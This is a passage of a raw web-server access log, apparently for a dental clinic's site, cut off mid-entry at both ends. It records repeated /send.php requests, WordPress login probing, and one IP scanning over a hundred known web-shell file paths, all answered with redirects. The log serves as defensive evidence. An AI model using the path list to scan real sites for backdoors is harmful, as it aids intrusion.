Safari/604.1" 86.8.204.43 - - [13/Aug/2025:08:30:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:08:30:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:08:46:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:08:46:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:08:46:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:08:46:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:09:00:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:09:00:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:09:00:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:09:00:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.106.143.6 - - [13/Aug/2025:09:02:53 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:09:14:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:09:14:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:09:14:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:09:14:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 104.28.234.179 - - [13/Aug/2025:09:20:59 -0400] "POST /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 272 "http://orthosquare.in/dental-tourism/teeth-implant/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 207.180.254.63 - - [13/Aug/2025:09:25:13 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "https://www.facebook.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 207.180.254.63 - - [13/Aug/2025:09:25:14 -0400] "GET /wordpress/wp-login.php HTTP/1.1" 301 253 "https://www.google.com/search?q=wordpress" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 207.180.254.63 - - [13/Aug/2025:09:25:14 -0400] "GET /wp-admin/ HTTP/1.1" 301 240 "https://wordpress.org/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 68.183.245.101 - - [13/Aug/2025:09:28:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:09:28:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:09:28:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:09:28:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.83.8 - - [13/Aug/2025:09:35:00 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 101.34.27.77 - - [13/Aug/2025:09:43:19 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" 86.8.204.43 - - [13/Aug/2025:09:44:16 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:09:44:16 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:09:44:16 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:09:44:16 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 31.13.103.112 - - [13/Aug/2025:09:46:19 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 69.171.231.7 - - [13/Aug/2025:09:48:59 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 101.34.27.77 - - [13/Aug/2025:09:50:00 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" 68.183.245.101 - - [13/Aug/2025:09:58:43 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:09:58:43 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:09:58:43 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:09:58:44 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:10:12:39 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:10:12:39 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:10:12:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:10:12:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:10:27:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:10:27:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:10:27:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:10:27:49 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.95.33 - - [13/Aug/2025:10:32:07 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 206.189.247.132 - - [13/Aug/2025:10:41:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:10:41:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:10:41:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:10:41:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 13.94.92.103 - - [13/Aug/2025:10:56:49 -0400] "GET /.alf.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:50 -0400] "GET /.bod/.ll/ss.php HTTP/1.1" 301 246 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:50 -0400] "GET /.well-known/about/function.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:50 -0400] "GET /.well-known/classwithtostring.php HTTP/1.1" 301 264 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:51 -0400] "GET /.well-known/index.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:51 -0400] "GET /.well-known/radio.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:51 -0400] "GET /10.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:51 -0400] "GET /12.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:52 -0400] "GET /13k.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:52 -0400] "GET /87.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:52 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:53 -0400] "GET /about/Geforce.php HTTP/1.1" 301 248 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:53 -0400] "GET /about/function.php HTTP/1.1" 301 249 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:53 -0400] "GET /admin.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:53 -0400] "GET /admin/admin.php HTTP/1.1" 301 246 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:54 -0400] "GET /admin/function.php HTTP/1.1" 301 249 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:54 -0400] "GET /admin/index.php HTTP/1.1" 301 246 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:54 -0400] "GET /adminfuns.php HTTP/1.1" 301 244 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:54 -0400] "GET /akc.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:55 -0400] "GET /al.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:55 -0400] "GET /alfa.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:55 -0400] "GET /as.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:55 -0400] "GET /asasx.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:56 -0400] "GET /assets/images/doc.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:56 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:56 -0400] "GET /auth.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:56 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:57 -0400] "GET /autoload_classmap/function.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:57 -0400] "GET /b.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:57 -0400] "GET /blog/fw.php HTTP/1.1" 301 242 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:58 -0400] "GET /bugz.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:58 -0400] "GET /byp.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:58 -0400] "GET /cc.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:58 -0400] "GET /chosen.php HTTP/1.1" 301 241 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:59 -0400] "GET /class.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:59 -0400] "GET /classwithtostring.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:59 -0400] "GET /composer.php HTTP/1.1" 301 243 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:56:59 -0400] "GET /css.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:00 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:00 -0400] "GET /edit.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:00 -0400] "GET /f35.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:00 -0400] "GET /file.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:01 -0400] "GET /file2.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:01 -0400] "GET /filemanager.php HTTP/1.1" 301 246 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:01 -0400] "GET /files/index.php HTTP/1.1" 301 246 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:01 -0400] "GET /fix.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:02 -0400] "GET /flower.php HTTP/1.1" 301 241 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:02 -0400] "GET /fox.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:02 -0400] "GET /function/function.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:03 -0400] "GET /g.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:03 -0400] "GET /gecko.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:03 -0400] "GET /gel4y.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:03 -0400] "GET /gelay.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:04 -0400] "GET /gg.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:04 -0400] "GET /goat.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:04 -0400] "GET /goods.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:04 -0400] "GET /h.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:05 -0400] "GET /images/admin.php HTTP/1.1" 301 247 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:05 -0400] "GET /images/class-config.php HTTP/1.1" 301 254 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:05 -0400] "GET /inc.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:05 -0400] "GET /index.bak.php HTTP/1.1" 301 244 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:06 -0400] "GET /index/function.php HTTP/1.1" 301 249 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:06 -0400] "GET /info.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:06 -0400] "GET /infos.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:06 -0400] "GET /ioxi-o.php HTTP/1.1" 301 241 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:07 -0400] "GET /k.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:07 -0400] "GET /m.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:07 -0400] "GET /mar.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:08 -0400] "GET /mini HTTP/1.1" 301 235 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:08 -0400] "GET /mini.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:08 -0400] "GET /mm.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:08 -0400] "GET /ms-edit.php HTTP/1.1" 301 242 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:09 -0400] "GET /ms-themes.php HTTP/1.1" 301 244 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:09 -0400] "GET /options-general.php HTTP/1.1" 301 250 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:09 -0400] "GET /options-reading.php HTTP/1.1" 301 250 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:09 -0400] "GET /options-writing.php HTTP/1.1" 301 250 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:10 -0400] "GET /ova.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:10 -0400] "GET /pages.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:10 -0400] "GET /php.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:10 -0400] "GET /php8.php HTTP/1.1" 301 239 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:11 -0400] "GET /pinfo.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:11 -0400] "GET /radio.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:11 -0400] "GET /robots.php HTTP/1.1" 301 241 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:12 -0400] "GET /rt.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:12 -0400] "GET /s.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:12 -0400] "GET /setup.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:12 -0400] "GET /simple.php HTTP/1.1" 301 241 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:13 -0400] "GET /sts.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:13 -0400] "GET /system_log.php HTTP/1.1" 301 245 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:13 -0400] "GET /test1.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:13 -0400] "GET /themes/zMousse/otuz1.php HTTP/1.1" 301 255 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:14 -0400] "GET /tinyfilemanager.php HTTP/1.1" 301 250 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:14 -0400] "GET /ty.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:14 -0400] "GET /users.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:14 -0400] "GET /w.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:15 -0400] "GET /wp-aa.php HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:15 -0400] "GET /wp-admin/ HTTP/1.1" 301 240 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:15 -0400] "GET /wp-admin/admin.php HTTP/1.1" 301 249 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:15 -0400] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:16 -0400] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 265 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:16 -0400] "GET /wp-admin/css/colors/ectoplasm/about.php HTTP/1.1" 301 270 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:16 -0400] "GET /wp-admin/css/colors/light/wp-login.php HTTP/1.1" 301 269 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:17 -0400] "GET /wp-admin/images/moon.php HTTP/1.1" 301 255 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:17 -0400] "GET /wp-admin/includes/colour.php HTTP/1.1" 301 259 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:17 -0400] "GET /wp-admin/includes/header.php HTTP/1.1" 301 259 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:18 -0400] "GET /wp-admin/includes/index.php HTTP/1.1" 301 258 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:18 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 251 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:18 -0400] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 301 264 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:18 -0400] "GET /wp-admin/js/index.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:19 -0400] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 301 260 "-" "-" 206.189.247.132 - - [13/Aug/2025:10:57:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:10:57:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:10:57:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:10:57:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 13.94.92.103 - - [13/Aug/2025:10:57:19 -0400] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 301 260 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:19 -0400] "GET /wp-admin/mah.php HTTP/1.1" 301 247 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:20 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 255 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:20 -0400] "GET /wp-admin/network/network.php HTTP/1.1" 301 259 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:20 -0400] "GET /wp-admin/wp-admins.php HTTP/1.1" 301 253 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:20 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:21 -0400] "GET /wp-admin/wp.php HTTP/1.1" 301 246 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:21 -0400] "GET 